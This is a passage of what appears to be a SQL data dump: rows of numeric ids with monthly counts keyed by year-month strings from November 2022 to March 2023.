4),(4765,2,'202211',24),(4976,2,'202211',24),(5122,2,'202211',24),(5140,2,'202211',24),(5157,2,'202211',24),(2159,2,'202211',25),(2769,2,'202211',25),(2801,2,'202211',25),(2813,2,'202211',25),(3430,2,'202211',25),(4703,2,'202211',25),(481,2,'202211',26),(486,2,'202211',26),(1718,2,'202211',26),(1737,2,'202211',26),(3117,2,'202211',26),(4391,2,'202211',26),(4771,2,'202211',26),(5028,2,'202211',26),(5146,2,'202211',26),(5153,2,'202211',26),(1724,2,'202211',27),(3290,2,'202211',27),(4238,2,'202211',27),(4454,2,'202211',27),(4529,2,'202211',27),(4776,2,'202211',27),(467,2,'202211',28),(1728,2,'202211',28),(4416,2,'202211',28),(4428,2,'202211',28),(4660,2,'202211',28),(4694,2,'202211',28),(5071,2,'202211',28),(477,2,'202211',29),(1726,2,'202211',29),(1745,2,'202211',29),(3710,2,'202211',29),(2804,2,'202211',30),(4323,2,'202211',30),(4335,2,'202211',30),(4420,2,'202211',30),(4674,2,'202211',30),(4996,2,'202211',30),(4706,2,'202211',31),(4762,2,'202211',31),(5101,2,'202211',31),(473,2,'202211',32),(469,2,'202211',33),(2457,2,'202211',33),(4709,2,'202211',33),(1614,2,'202211',34),(470,2,'202211',35),(472,2,'202211',35),(2911,2,'202211',35),(4524,2,'202211',35),(4700,2,'202211',35),(5062,2,'202211',35),(474,2,'202211',36),(1604,2,'202211',36),(4412,2,'202211',36),(5128,2,'202211',36),(468,2,'202211',37),(3066,2,'202211',37),(4338,2,'202211',37),(1598,2,'202211',38),(4677,2,'202211',38),(5131,2,'202211',38),(487,2,'202211',39),(2658,2,'202211',39),(4645,2,'202211',39),(74,2,'202211',41),(5137,2,'202211',41),(2309,2,'202211',42),(5076,2,'202211',42),(1606,2,'202211',43),(2809,2,'202211',43),(3069,2,'202211',43),(87,2,'202211',45),(3005,2,'202211',45),(3102,2,'202211',45),(335,2,'202211',47),(570,2,'202211',47),(5134,2,'202211',47),(1596,2,'202211',48),(3083,2,'202211',48),(108,2,'202211',49),(4520,2,'202211',49),(1588,2,'202211',51),(1608,2,'202211',52),(1722,2,'202211',52),(1612,2,'202211',54),(3781,2,'202211',54),(4457,2,'202211',56),(84,2,'202211',57),(3060,2,'202211',58),(4930,2,'202211',58),(2503,2,'202211',60),(1600,2,'202211',63),(3764,2,'202211',64),(3030,2,'202211',65),(5163,2,'202211',67),(1594,2,'202211',68),(1610,2,'202211',68),(91,2,'202211',72),(76,2,'202211',73),(1582,2,'202211',73),(1602,2,'202211',73),(72,2,'202211',86),(68,2,'202211',93),(89,2,'202211',97),(1544,2,'202211',98),(1586,2,'202211',117),(2904,2,'202211',121),(80,2,'202211',328),(9,2,'202211',2788),(110,2,'202212',7),(1734,2,'202212',7),(3257,2,'202212',9),(4858,2,'202212',9),(4883,2,'202212',9),(106,2,'202212',10),(1695,2,'202212',10),(2152,2,'202212',10),(3282,2,'202212',10),(3749,2,'202212',10),(4382,2,'202212',10),(4432,2,'202212',10),(1697,2,'202212',11),(1715,2,'202212',11),(2063,2,'202212',11),(2156,2,'202212',11),(2161,2,'202212',11),(2993,2,'202212',11),(3109,2,'202212',11),(3229,2,'202212',11),(3287,2,'202212',11),(3297,2,'202212',11),(3531,2,'202212',11),(3727,2,'202212',11),(4404,2,'202212',11),(4688,2,'202212',11),(4862,2,'202212',11),(4878,2,'202212',11),(1701,2,'202212',12),(1705,2,'202212',12),(1772,2,'202212',12),(2293,2,'202212',12),(3097,2,'202212',12),(3249,2,'202212',12),(3724,2,'202212',12),(3738,2,'202212',12),(4332,2,'202212',12),(4368,2,'202212',12),(4377,2,'202212',12),(4424,2,'202212',12),(4440,2,'202212',12),(4546,2,'202212',12),(4792,2,'202212',12),(4797,2,'202212',12),(4802,2,'202212',12),(4893,2,'202212',12),(1711,2,'202212',13),(1747,2,'202212',13),(1751,2,'202212',13),(2148,2,'202212',13),(3034,2,'202212',13),(3096,2,'202212',13),(3278,2,'202212',13),(3438,2,'202212',13),(3731,2,'202212',13),(4326,2,'202212',13),(4387,2,'202212',13),(4396,2,'202212',13),(4448,2,'202212',13),(4648,2,'202212',13),(4712,2,'202212',13),(4750,2,'202212',13),(1713,2,'202212',14),(1720,2,'202212',14),(1730,2,'202212',14),(1732,2,'202212',14),(1768,2,'202212',14),(1780,2,'202212',14),(1782,2,'202212',14),(2248,2,'202212',14),(2751,2,'202212',14),(3107,2,'202212',14),(3124,2,'202212',14),(3127,2,'202212',14),(3245,2,'202212',14),(3265,2,'202212',14),(3280,2,'202212',14),(3285,2,'202212',14),(4373,2,'202212',14),(4400,2,'202212',14),(4582,2,'202212',14),(4591,2,'202212',14),(4681,2,'202212',14),(4870,2,'202212',14),(4983,2,'202212',14),(476,2,'202212',15),(481,2,'202212',15),(1709,2,'202212',15),(1739,2,'202212',15),(1776,2,'202212',15),(2150,2,'202212',15),(2252,2,'202212',15),(3063,2,'202212',15),(3092,2,'202212',15),(3240,2,'202212',15),(3247,2,'202212',15),(3251,2,'202212',15),(3259,2,'202212',15),(3263,2,'202212',15),(3267,2,'202212',15),(3316,2,'202212',15),(3721,2,'202212',15),(4514,2,'202212',15),(4517,2,'202212',15),(4668,2,'202212',15),(4744,2,'202212',15),(4768,2,'202212',15),(4866,2,'202212',15),(4888,2,'202212',15),(5042,2,'202212',15),(102,2,'202212',16),(1726,2,'202212',16),(1774,2,'202212',16),(3041,2,'202212',16),(3275,2,'202212',16),(3479,2,'202212',16),(3541,2,'202212',16),(3746,2,'202212',16),(3752,2,'202212',16),(3771,2,'202212',16),(4329,2,'202212',16),(4341,2,'202212',16),(4357,2,'202212',16),(4436,2,'202212',16),(4551,2,'202212',16),(4651,2,'202212',16),(4685,2,'202212',16),(4691,2,'202212',16),(5024,2,'202212',16),(5050,2,'202212',16),(1590,2,'202212',17),(1743,2,'202212',17),(1749,2,'202212',17),(2558,2,'202212',17),(2609,2,'202212',17),(3045,2,'202212',17),(3104,2,'202212',17),(3226,2,'202212',17),(3269,2,'202212',17),(3271,2,'202212',17),(4275,2,'202212',17),(4323,2,'202212',17),(4335,2,'202212',17),(4408,2,'202212',17),(4694,2,'202212',17),(4741,2,'202212',17),(4874,2,'202212',17),(4897,2,'202212',17),(5020,2,'202212',17),(5248,2,'202212',17),(488,2,'202212',18),(1703,2,'202212',18),(1741,2,'202212',18),(1770,2,'202212',18),(2154,2,'202212',18),(2748,2,'202212',18),(2965,2,'202212',18),(3006,2,'202212',18),(3243,2,'202212',18),(3482,2,'202212',18),(3534,2,'202212',18),(3777,2,'202212',18),(4420,2,'202212',18),(4747,2,'202212',18),(4753,2,'202212',18),(4980,2,'202212',18),(484,2,'202212',19),(1699,2,'202212',19),(1707,2,'202212',19),(1778,2,'202212',19),(2165,2,'202212',19),(2296,2,'202212',19),(2704,2,'202212',19),(2801,2,'202212',19),(2956,2,'202212',19),(2991,2,'202212',19),(3087,2,'202212',19),(3090,2,'202212',19),(3261,2,'202212',19),(3714,2,'202212',19),(4556,2,'202212',19),(4566,2,'202212',19),(4762,2,'202212',19),(4977,2,'202212',19),(480,2,'202212',20),(483,2,'202212',20),(2297,2,'202212',20),(3027,2,'202212',20),(3117,2,'202212',20),(3273,2,'202212',20),(3430,2,'202212',20),(3489,2,'202212',20),(4756,2,'202212',20),(4771,2,'202212',20),(5037,2,'202212',20),(5054,2,'202212',20),(5146,2,'202212',20),(471,2,'202212',21),(2617,2,'202212',21),(3253,2,'202212',21),(3774,2,'202212',21),(4416,2,'202212',21),(4587,2,'202212',21),(4608,2,'202212',21),(5028,2,'202212',21),(5046,2,'202212',21),(5062,2,'202212',21),(5122,2,'202212',21),(478,2,'202212',22),(2159,2,'202212',22),(2178,2,'202212',22),(2775,2,'202212',22),(2989,2,'202212',22),(3290,2,'202212',22),(3486,2,'202212',22),(3735,2,'202212',22),(4391,2,'202212',22),(4428,2,'202212',22),(4542,2,'202212',22),(1584,2,'202212',23),(3038,2,'202212',23),(3498,2,'202212',23),(4722,2,'202212',23),(4759,2,'202212',23),(5125,2,'202212',23),(5157,2,'202212',23),(467,2,'202212',24),(1724,2,'202212',24),(3072,2,'202212',24),(3079,2,'202212',24),(4301,2,'202212',24),(5067,2,'202212',24),(5101,2,'202212',24),(485,2,'202212',25),(3004,2,'202212',25),(4238,2,'202212',25),(4612,2,'202212',25),(4976,2,'202212',25),(5033,2,'202212',25),(5153,2,'202212',25),(479,2,'202212',26),(1718,2,'202212',26),(2769,2,'202212',26),(2964,2,'202212',26),(3023,2,'202212',26),(4454,2,'202212',26),(4654,2,'202212',26),(4988,2,'202212',26),(5058,2,'202212',26),(477,2,'202212',27),(1592,2,'202212',27),(2911,2,'202212',27),(3307,2,'202212',27),(3710,2,'202212',27),(3742,2,'202212',27),(4776,2,'202212',27),(5140,2,'202212',27),(474,2,'202212',28),(482,2,'202212',28),(3313,2,'202212',28),(5071,2,'202212',28),(5128,2,'202212',28),(5131,2,'202212',28),(1745,2,'202212',29),(3102,2,'202212',29),(4529,2,'202212',29),(4697,2,'202212',29),(570,2,'202212',30),(4412,2,'202212',30),(4657,2,'202212',30),(5080,2,'202212',30),(470,2,'202212',32),(1728,2,'202212',32),(2813,2,'202212',32),(4703,2,'202212',33),(4709,2,'202212',33),(4765,2,'202212',33),(4996,2,'202212',33),(1604,2,'202212',34),(1722,2,'202212',34),(3069,2,'202212',34),(4444,2,'202212',34),(4524,2,'202212',34),(5076,2,'202212',34),(469,2,'202212',35),(486,2,'202212',35),(1766,2,'202212',35),(2804,2,'202212',35),(3060,2,'202212',35),(4660,2,'202212',35),(468,2,'202212',36),(74,2,'202212',37),(5137,2,'202212',38),(473,2,'202212',39),(472,2,'202212',41),(2503,2,'202212',41),(4363,2,'202212',41),(335,2,'202212',42),(1598,2,'202212',42),(1737,2,'202212',42),(2309,2,'202212',42),(3005,2,'202212',42),(4700,2,'202212',42),(1606,2,'202212',44),(4674,2,'202212',44),(4706,2,'202212',44),(487,2,'202212',45),(108,2,'202212',46),(1614,2,'202212',46),(5134,2,'202212',47),(87,2,'202212',49),(1608,2,'202212',50),(2457,2,'202212',50),(2658,2,'202212',50),(4338,2,'202212',50),(1600,2,'202212',52),(4930,2,'202212',52),(3066,2,'202212',55),(3083,2,'202212',55),(1588,2,'202212',57),(4520,2,'202212',57),(4677,2,'202212',60),(1596,2,'202212',61),(76,2,'202212',62),(4663,2,'202212',62),(3781,2,'202212',65),(84,2,'202212',69),(1544,2,'202212',69),(4457,2,'202212',71),(4645,2,'202212',72),(2809,2,'202212',74),(3764,2,'202212',78),(1610,2,'202212',79),(3030,2,'202212',82),(91,2,'202212',83),(1582,2,'202212',84),(5163,2,'202212',85),(1594,2,'202212',88),(1602,2,'202212',88),(68,2,'202212',90),(1612,2,'202212',91),(72,2,'202212',98),(89,2,'202212',108),(1586,2,'202212',110),(2904,2,'202212',111),(80,2,'202212',402),(9,2,'202212',2665),(106,2,'202301',5),(110,2,'202301',5),(1782,2,'202301',5),(1776,2,'202301',6),(2993,2,'202301',7),(3263,2,'202301',7),(4373,2,'202301',7),(1780,2,'202301',8),(3109,2,'202301',8),(4792,2,'202301',8),(5259,2,'202301',8),(1697,2,'202301',9),(1699,2,'202301',9),(1732,2,'202301',9),(2150,2,'202301',9),(2248,2,'202301',9),(3087,2,'202301',9),(3261,2,'202301',9),(3265,2,'202301',9),(3278,2,'202301',9),(4404,2,'202301',9),(4797,2,'202301',9),(4883,2,'202301',9),(5264,2,'202301',9),(1705,2,'202301',10),(1707,2,'202301',10),(1715,2,'202301',10),(1743,2,'202301',10),(1749,2,'202301',10),(2165,2,'202301',10),(2252,2,'202301',10),(3079,2,'202301',10),(3107,2,'202301',10),(3249,2,'202301',10),(3259,2,'202301',10),(3267,2,'202301',10),(3269,2,'202301',10),(3282,2,'202301',10),(3541,2,'202301',10),(3774,2,'202301',10),(4382,2,'202301',10),(4396,2,'202301',10),(4893,2,'202301',10),(1695,2,'202301',11),(1709,2,'202301',11),(1720,2,'202301',11),(1730,2,'202301',11),(1739,2,'202301',11),(1747,2,'202301',11),(1768,2,'202301',11),(1778,2,'202301',11),(2152,2,'202301',11),(3251,2,'202301',11),(3287,2,'202301',11),(3297,2,'202301',11),(4275,2,'202301',11),(4368,2,'202301',11),(4387,2,'202301',11),(4546,2,'202301',11),(4648,2,'202301',11),(4744,2,'202301',11),(4802,2,'202301',11),(4858,2,'202301',11),(4862,2,'202301',11),(478,2,'202301',12),(1734,2,'202301',12),(2991,2,'202301',12),(3034,2,'202301',12),(3097,2,'202301',12),(3275,2,'202301',12),(3430,2,'202301',12),(3721,2,'202301',12),(3727,2,'202301',12),(3749,2,'202301',12),(4329,2,'202301',12),(4377,2,'202301',12),(4408,2,'202301',12),(4424,2,'202301',12),(4432,2,'202301',12),(4514,2,'202301',12),(4591,2,'202301',12),(4651,2,'202301',12),(4685,2,'202301',12),(4712,2,'202301',12),(4866,2,'202301',12),(5046,2,'202301',12),(1713,2,'202301',13),(1741,2,'202301',13),(2063,2,'202301',13),(2293,2,'202301',13),(3041,2,'202301',13),(3063,2,'202301',13),(3096,2,'202301',13),(3104,2,'202301',13),(3124,2,'202301',13),(3229,2,'202301',13),(3245,2,'202301',13),(3271,2,'202301',13),(3273,2,'202301',13),(3280,2,'202301',13),(3316,2,'202301',13),(3486,2,'202301',13),(3731,2,'202301',13),(4332,2,'202301',13),(4400,2,'202301',13),(4668,2,'202301',13),(4681,2,'202301',13),(4688,2,'202301',13),(4691,2,'202301',13),(4741,2,'202301',13),(4878,2,'202301',13),(4983,2,'202301',13),(5020,2,'202301',13),(5024,2,'202301',13),(102,2,'202301',14),(1745,2,'202301',14),(1774,2,'202301',14),(2154,2,'202301',14),(2156,2,'202301',14),(2161,2,'202301',14),(3247,2,'202301',14),(3253,2,'202301',14),(3257,2,'202301',14),(3285,2,'202301',14),(3479,2,'202301',14),(3746,2,'202301',14),(3777,2,'202301',14),(4357,2,'202301',14),(4440,2,'202301',14),(4753,2,'202301',14),(4888,2,'202301',14),(5028,2,'202301',14),(5050,2,'202301',14),(5067,2,'202301',14),(1718,2,'202301',15),(1770,2,'202301',15),(1772,2,'202301',15),(2296,2,'202301',15),(2558,2,'202301',15),(2965,2,'202301',15),(3724,2,'202301',15),(3735,2,'202301',15),(4363,2,'202301',15),(4556,2,'202301',15),(4582,2,'202301',15),(4750,2,'202301',15),(4768,2,'202301',15),(5042,2,'202301',15),(5054,2,'202301',15),(480,2,'202301',16),(481,2,'202301',16),(1701,2,'202301',16),(1711,2,'202301',16),(2148,2,'202301',16),(2617,2,'202301',16),(2748,2,'202301',16),(3006,2,'202301',16),(3027,2,'202301',16),(3090,2,'202301',16),(3127,2,'202301',16),(3534,2,'202301',16),(3771,2,'202301',16),(4338,2,'202301',16),(4341,2,'202301',16),(4428,2,'202301',16),(4436,2,'202301',16),(4608,2,'202301',16),(4756,2,'202301',16),(4762,2,'202301',16),(4870,2,'202301',16),(4897,2,'202301',16),(471,2,'202301',17),(482,2,'202301',17),(485,2,'202301',17),(1590,2,'202301',17),(2609,2,'202301',17),(2801,2,'202301',17),(2804,2,'202301',17),(2956,2,'202301',17),(2964,2,'202301',17),(3045,2,'202301',17),(3240,2,'202301',17),(3243,2,'202301',17),(3482,2,'202301',17),(3714,2,'202301',17),(3742,2,'202301',17),(4517,2,'202301',17),(4566,2,'202301',17),(4977,2,'202301',17),(4980,2,'202301',17),(476,2,'202301',18),(488,2,'202301',18),(2159,2,'202301',18),(2751,2,'202301',18),(2911,2,'202301',18),(3023,2,'202301',18),(3117,2,'202301',18),(3313,2,'202301',18),(3438,2,'202301',18),(3489,2,'202301',18),(3498,2,'202301',18),(3752,2,'202301',18),(4301,2,'202301',18),(4335,2,'202301',18),(4657,2,'202301',18),(4722,2,'202301',18),(4747,2,'202301',18),(4759,2,'202301',18),(4771,2,'202301',18),(467,2,'202301',19),(486,2,'202301',19),(2704,2,'202301',19),(3092,2,'202301',19),(3226,2,'202301',19),(3531,2,'202301',19),(4448,2,'202301',19),(5062,2,'202301',19),(477,2,'202301',20),(479,2,'202301',20),(3710,2,'202301',20),(5125,2,'202301',20),(5153,2,'202301',20),(483,2,'202301',21),(3038,2,'202301',21),(3307,2,'202301',21),(4587,2,'202301',21),(4703,2,'202301',21),(5101,2,'202301',21),(5122,2,'202301',21),(5146,2,'202301',21),(1726,2,'202301',22),(1751,2,'202301',22),(2813,2,'202301',22),(3004,2,'202301',22),(4323,2,'202301',22),(4654,2,'202301',22),(5037,2,'202301',22),(5071,2,'202301',22),(1584,2,'202301',23),(1728,2,'202301',23),(2178,2,'202301',23),(2297,2,'202301',23),(2989,2,'202301',23),(4326,2,'202301',23),(4416,2,'202301',23),(4524,2,'202301',23),(4542,2,'202301',23),(4776,2,'202301',23),(4988,2,'202301',23),(3072,2,'202301',24),(4420,2,'202301',24),(4874,2,'202301',24),(4976,2,'202301',24),(4996,2,'202301',24),(5248,2,'202301',24),(469,2,'202301',25),(484,2,'202301',25),(1606,2,'202301',25),(1703,2,'202301',25),(1766,2,'202301',25),(2775,2,'202301',25),(4444,2,'202301',25),(4454,2,'202301',25),(4660,2,'202301',25),(5058,2,'202301',25),(1614,2,'202301',26),(3290,2,'202301',26),(3738,2,'202301',26),(4551,2,'202301',26),(4697,2,'202301',26),(1724,2,'202301',27),(4709,2,'202301',27),(4765,2,'202301',27),(5157,2,'202301',27),(473,2,'202301',28),(4412,2,'202301',28),(4612,2,'202301',28),(4706,2,'202301',28),(5140,2,'202301',28),(1737,2,'202301',29),(4238,2,'202301',29),(472,2,'202301',30),(4674,2,'202301',30),(4694,2,'202301',30),(5128,2,'202301',30),(5131,2,'202301',30),(5268,2,'202301',30),(74,2,'202301',31),(4663,2,'202301',31),(1722,2,'202301',32),(2309,2,'202301',32),(2769,2,'202301',32),(4529,2,'202301',32),(5076,2,'202301',33),(474,2,'202301',34),(570,2,'202301',34),(3066,2,'202301',34),(4520,2,'202301',34),(5256,2,'202301',34),(3069,2,'202301',35),(5080,2,'202301',35),(1604,2,'202301',36),(4677,2,'202301',36),(5137,2,'202301',36),(4700,2,'202301',37),(487,2,'202301',38),(1592,2,'202301',38),(1598,2,'202301',38),(2809,2,'202301',38),(3005,2,'202301',38),(3060,2,'202301',38),(4391,2,'202301',38),(1608,2,'202301',39),(84,2,'202301',40),(5033,2,'202301',40),(468,2,'202301',41),(2658,2,'202301',42),(3030,2,'202301',42),(5253,2,'202301',42),(1600,2,'202301',43),(5134,2,'202301',43),(4645,2,'202301',44),(2503,2,'202301',45),(108,2,'202301',46),(1544,2,'202301',46),(470,2,'202301',47),(335,2,'202301',49),(3102,2,'202301',50),(4930,2,'202301',51),(87,2,'202301',52),(1596,2,'202301',52),(2457,2,'202301',53),(3083,2,'202301',55),(3781,2,'202301',61),(3764,2,'202301',62),(4457,2,'202301',66),(76,2,'202301',68),(1588,2,'202301',74),(1610,2,'202301',75),(1594,2,'202301',81),(1612,2,'202301',81),(1582,2,'202301',88),(91,2,'202301',89),(68,2,'202301',97),(5163,2,'202301',97),(72,2,'202301',100),(1602,2,'202301',111),(1586,2,'202301',129),(89,2,'202301',141),(2904,2,'202301',158),(80,2,'202301',420),(9,2,'202301',2962),(106,2,'202302',6),(1730,2,'202302',6),(1749,2,'202302',6),(4440,2,'202302',6),(1780,2,'202302',7),(2296,2,'202302',7),(3267,2,'202302',7),(3278,2,'202302',7),(4382,2,'202302',7),(110,2,'202302',8),(1705,2,'202302',8),(1720,2,'202302',8),(1734,2,'202302',8),(1747,2,'202302',8),(1776,2,'202302',8),(2156,2,'202302',8),(2248,2,'202302',8),(2993,2,'202302',8),(3087,2,'202302',8),(3259,2,'202302',8),(3265,2,'202302',8),(4797,2,'202302',8),(1699,2,'202302',9),(1772,2,'202302',9),(2063,2,'202302',9),(3229,2,'202302',9),(3247,2,'202302',9),(3280,2,'202302',9),(1768,2,'202302',10),(1774,2,'202302',10),(1782,2,'202302',10),(2150,2,'202302',10),(2152,2,'202302',10),(2154,2,'202302',10),(2991,2,'202302',10),(3041,2,'202302',10),(3243,2,'202302',10),(3249,2,'202302',10),(3269,2,'202302',10),(3282,2,'202302',10),(3287,2,'202302',10),(3541,2,'202302',10),(3727,2,'202302',10),(4408,2,'202302',10),(4432,2,'202302',10),(4591,2,'202302',10),(4792,2,'202302',10),(4883,2,'202302',10),(4888,2,'202302',10),(1695,2,'202302',11),(1732,2,'202302',11),(1739,2,'202302',11),(2293,2,'202302',11),(3096,2,'202302',11),(3104,2,'202302',11),(3273,2,'202302',11),(3275,2,'202302',11),(3738,2,'202302',11),(3774,2,'202302',11),(4363,2,'202302',11),(4368,2,'202302',11),(4377,2,'202302',11),(4387,2,'202302',11),(4428,2,'202302',11),(4546,2,'202302',11),(4608,2,'202302',11),(4612,2,'202302',11),(4648,2,'202302',11),(4750,2,'202302',11),(4858,2,'202302',11),(4870,2,'202302',11),(4878,2,'202302',11),(4897,2,'202302',11),(1701,2,'202302',12),(2252,2,'202302',12),(2704,2,'202302',12),(2748,2,'202302',12),(3109,2,'202302',12),(3240,2,'202302',12),(3251,2,'202302',12),(3253,2,'202302',12),(3271,2,'202302',12),(3285,2,'202302',12),(4396,2,'202302',12),(4424,2,'202302',12),(4444,2,'202302',12),(4862,2,'202302',12),(4893,2,'202302',12),(5020,2,'202302',12),(1590,2,'202302',13),(1707,2,'202302',13),(1713,2,'202302',13),(1715,2,'202302',13),(1741,2,'202302',13),(2161,2,'202302',13),(2558,2,'202302',13),(3023,2,'202302',13),(3027,2,'202302',13),(3097,2,'202302',13),(3107,2,'202302',13),(3226,2,'202302',13),(3297,2,'202302',13),(3746,2,'202302',13),(3771,2,'202302',13),(4332,2,'202302',13),(4373,2,'202302',13),(4566,2,'202302',13),(4587,2,'202302',13),(4651,2,'202302',13),(4668,2,'202302',13),(5028,2,'202302',13),(5067,2,'202302',13),(481,2,'202302',14),(1697,2,'202302',14),(1778,2,'202302',14),(2178,2,'202302',14),(2956,2,'202302',14),(3005,2,'202302',14),(3045,2,'202302',14),(3263,2,'202302',14),(3316,2,'202302',14),(3749,2,'202302',14),(4448,2,'202302',14),(4517,2,'202302',14),(4681,2,'202302',14),(4741,2,'202302',14),(4866,2,'202302',14),(4980,2,'202302',14),(4983,2,'202302',14),(4988,2,'202302',14),(5058,2,'202302',14),(5248,2,'202302',14),(477,2,'202302',15),(480,2,'202302',15),(482,2,'202302',15),(1751,2,'202302',15),(3006,2,'202302',15),(3092,2,'202302',15),(3245,2,'202302',15),(3257,2,'202302',15),(3261,2,'202302',15),(3531,2,'202302',15),(3534,2,'202302',15),(3710,2,'202302',15),(3714,2,'202302',15),(3721,2,'202302',15),(3731,2,'202302',15),(3735,2,'202302',15),(4275,2,'202302',15),(4341,2,'202302',15),(4400,2,'202302',15),(4685,2,'202302',15),(4688,2,'202302',15),(4744,2,'202302',15),(4759,2,'202302',15),(4802,2,'202302',15),(5037,2,'202302',15),(5050,2,'202302',15),(5054,2,'202302',15),(102,2,'202302',16),(471,2,'202302',16),(485,2,'202302',16),(486,2,'202302',16),(1726,2,'202302',16),(1737,2,'202302',16),(1743,2,'202302',16),(2775,2,'202302',16),(2965,2,'202302',16),(3038,2,'202302',16),(3063,2,'202302',16),(3072,2,'202302',16),(3079,2,'202302',16),(3117,2,'202302',16),(3127,2,'202302',16),(3290,2,'202302',16),(3479,2,'202302',16),(3486,2,'202302',16),(3724,2,'202302',16),(4404,2,'202302',16),(4514,2,'202302',16),(4712,2,'202302',16),(4756,2,'202302',16),(4771,2,'202302',16),(5071,2,'202302',16),(5101,2,'202302',16),(479,2,'202302',17),(1584,2,'202302',17),(2297,2,'202302',17),(2609,2,'202302',17),(2751,2,'202302',17),(2964,2,'202302',17),(3034,2,'202302',17),(3438,2,'202302',17),(3482,2,'202302',17),(3489,2,'202302',17),(3752,2,'202302',17),(4326,2,'202302',17),(4329,2,'202302',17),(4416,2,'202302',17),(4582,2,'202302',17),(4654,2,'202302',17),(4657,2,'202302',17),(4691,2,'202302',17),(4753,2,'202302',17),(5024,2,'202302',17),(5140,2,'202302',17),(5146,2,'202302',17),(478,2,'202302',18),(1709,2,'202302',18),(1770,2,'202302',18),(2159,2,'202302',18),(2617,2,'202302',18),(3124,2,'202302',18),(3430,2,'202302',18),(4747,2,'202302',18),(4762,2,'202302',18),(483,2,'202302',19),(484,2,'202302',19),(2804,2,'202302',19),(3307,2,'202302',19),(3742,2,'202302',19),(4323,2,'202302',19),(4357,2,'202302',19),(4542,2,'202302',19),(4556,2,'202302',19),(4874,2,'202302',19),(5042,2,'202302',19),(5046,2,'202302',19),(1718,2,'202302',20),(1745,2,'202302',20),(2911,2,'202302',20),(2989,2,'202302',20),(3090,2,'202302',20),(3777,2,'202302',20),(476,2,'202302',21),(1604,2,'202302',21),(1711,2,'202302',21),(2769,2,'202302',21),(2801,2,'202302',21),(3498,2,'202302',21),(4335,2,'202302',21),(4524,2,'202302',21),(4768,2,'202302',21),(467,2,'202302',22),(1722,2,'202302',22),(2813,2,'202302',22),(3102,2,'202302',22),(3313,2,'202302',22),(4454,2,'202302',22),(4694,2,'202302',22),(4703,2,'202302',22),(5062,2,'202302',22),(2165,2,'202302',23),(4391,2,'202302',23),(4420,2,'202302',23),(4660,2,'202302',23),(4706,2,'202302',23),(5131,2,'202302',23),(5153,2,'202302',23),(1614,2,'202302',24),(4765,2,'202302',24),(488,2,'202302',25),(570,2,'202302',25),(3004,2,'202302',25),(4436,2,'202302',25),(4722,2,'202302',25),(4776,2,'202302',25),(5080,2,'202302',25),(472,2,'202302',26),(1606,2,'202302',26),(1703,2,'202302',26),(1728,2,'202302',26),(5122,2,'202302',26),(5125,2,'202302',26),(469,2,'202302',27),(4412,2,'202302',27),(4529,2,'202302',27),(5157,2,'202302',27),(1724,2,'202302',28),(5134,2,'202302',28),(5137,2,'202302',28),(4238,2,'202302',29),(4301,2,'202302',29),(4551,2,'202302',30),(4709,2,'202302',30),(4977,2,'202302',30),(4697,2,'202302',31),(4976,2,'202302',31),(5033,2,'202302',31),(5280,2,'202302',31),(473,2,'202302',32),(487,2,'202302',32),(5264,2,'202302',32),(1608,2,'202302',33),(468,2,'202302',34),(4996,2,'202302',34),(5259,2,'202302',34),(5268,2,'202302',34),(474,2,'202302',35),(1766,2,'202302',35),(2658,2,'202302',35),(3069,2,'202302',35),(1592,2,'202302',36),(2148,2,'202302',36),(74,2,'202302',37),(4338,2,'202302',37),(5076,2,'202302',37),(2309,2,'202302',39),(2457,2,'202302',39),(3066,2,'202302',39),(4674,2,'202302',39),(4700,2,'202302',41),(4645,2,'202302',42),(1600,2,'202302',43),(5256,2,'202302',43),(84,2,'202302',44),(470,2,'202302',44),(1544,2,'202302',44),(2503,2,'202302',44),(3030,2,'202302',44),(5271,2,'202302',44),(3060,2,'202302',45),(4663,2,'202302',45),(4520,2,'202302',46),(4677,2,'202302',46),(1598,2,'202302',47),(3083,2,'202302',48),(108,2,'202302',49),(4930,2,'202302',51),(5276,2,'202302',52),(2809,2,'202302',53),(335,2,'202302',54),(3781,2,'202302',54),(5128,2,'202302',54),(5253,2,'202302',54),(1612,2,'202302',62),(1586,2,'202302',63),(5163,2,'202302',63),(1610,2,'202302',64),(1596,2,'202302',68),(4457,2,'202302',70),(3764,2,'202302',71),(1588,2,'202302',72),(1602,2,'202302',72),(87,2,'202302',76),(76,2,'202302',81),(1582,2,'202302',84),(91,2,'202302',85),(1594,2,'202302',95),(68,2,'202302',98),(89,2,'202302',98),(2904,2,'202302',102),(72,2,'202302',130),(80,2,'202302',359),(9,2,'202302',2565),(5326,2,'202303',4),(5330,2,'202303',6),(3240,2,'202303',7),(3727,2,'202303',7),(106,2,'202303',8),(3541,2,'202303',8),(4797,2,'202303',8),(3087,2,'202303',9),(3271,2,'202303',9),(3282,2,'202303',9),(4382,2,'202303',9),(4404,2,'202303',9),(4744,2,'202303',9),(4858,2,'202303',9),(4870,2,'202303',9),(4883,2,'202303',9),(110,2,'202303',10),(1751,2,'202303',10),(2161,2,'202303',10),(3247,2,'202303',10),(3265,2,'202303',10),(3269,2,'202303',10),(3280,2,'202303',10),(3738,2,'202303',10),(3749,2,'202303',10),(4368,2,'202303',10),(4440,2,'202303',10),(4514,2,'202303',10),(4691,2,'202303',10),(4750,2,'202303',10),(1697,2,'202303',11),(1720,2,'202303',11),(2156,2,'202303',11),(3097,2,'202303',11),(3278,2,'202303',11),(3287,2,'202303',11),(3438,2,'202303',11),(3724,2,'202303',11),(3774,2,'202303',11),(4373,2,'202303',11),(4396,2,'202303',11),(4428,2,'202303',11),(4651,2,'202303',11),(4802,2,'202303',11),(4888,2,'202303',11),(1709,2,'202303',12),(1732,2,'202303',12),(1734,2,'202303',12),(1743,2,'202303',12),(1780,2,'202303',12),(2964,2,'202303',12),(3027,2,'202303',12),(3104,2,'202303',12),(3109,2,'202303',12),(3229,2,'202303',12),(3253,2,'202303',12),(3257,2,'202303',12),(3275,2,'202303',12),(3297,2,'202303',12),(3316,2,'202303',12),(3735,2,'202303',12),(3771,2,'202303',12),(4432,2,'202303',12),(4587,2,'202303',12),(4685,2,'202303',12),(4741,2,'202303',12),(4756,2,'202303',12),(4792,2,'202303',12),(4862,2,'202303',12),(4988,2,'202303',12),(5020,2,'202303',12),(5058,2,'202303',12),(1695,2,'202303',13),(1707,2,'202303',13),(1718,2,'202303',13),(1730,2,'202303',13),(1782,2,'202303',13),(2063,2,'202303',13),(2152,2,'202303',13),(3096,2,'202303',13),(3249,2,'202303',13),(3267,2,'202303',13),(3273,2,'202303',13),(3742,2,'202303',13),(4275,2,'202303',13),(4363,2,'202303',13),(4400,2,'202303',13),(4546,2,'202303',13),(4591,2,'202303',13),(4712,2,'202303',13),(4878,2,'202303',1